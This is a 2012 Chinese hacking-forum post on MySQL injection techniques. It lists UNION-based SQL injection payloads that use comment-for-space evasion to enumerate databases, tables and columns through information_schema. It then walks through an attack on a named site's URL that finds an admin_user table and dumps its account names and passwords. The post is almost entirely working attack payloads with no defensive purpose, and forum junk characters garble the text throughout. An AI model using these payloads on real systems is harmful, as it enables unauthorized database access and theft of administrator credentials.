找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1988|回复: 0
打印 上一主题 下一主题

mysql注入技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:29:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
查库" p( m, Z# w( a/ F* v& @
  q7 @$ K+ A: T% ~* Y
id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*
+ z- I& p- C* j) h% e* S
/ ~, n* A8 i- L  ]2 \查表0 ]$ L% L- I! C8 i; s

) F/ X; T" p1 r! bid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1  c8 k1 D' {( r+ R6 {) C

! U( L1 H( P1 |  H) ]  F+ [7 L查段
' S* E- L3 c: c% ~1 S& W* x8 a) H8 h5 Z! i! s% A8 d
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1( K! R3 O1 d4 ?. }1 i

- D/ V  z) x' [) ?* @6 |: o: a1 w/ q) \3 |- n
mysql5高级注入方法暴表$ D* L6 k- Y" V# a6 k! }, g
( s! V' N1 x' L" P
例子如下:+ b( U, _+ d( }! K3 ~0 i& L" a

* o/ y9 R0 b% l1.爆表3 c2 W( l* }) B! A; v. Z2 W
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
0 I9 M7 Y+ k; M: V; H这样爆到第4个时出现了admin_user表。
% ?2 W& E3 i7 Q- \5 k; f- Z6 U: i, ?1 Q+ c( i6 U- }7 x5 f
2.暴字段0 O+ U1 K* @2 c4 u! L
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
! D3 P. g! Y3 X9 y: y* ~! N+ c6 x1 Z! O5 r) k
8 w  m! C5 H+ O( g! r
3.爆密码! {" ^1 }* F$ n& a' V
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 0 C5 `/ k# A8 F6 H  w
$ E2 t- y# q: s) z+ j2 Q) m
: T2 A% s! B" u) ^' F8 \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表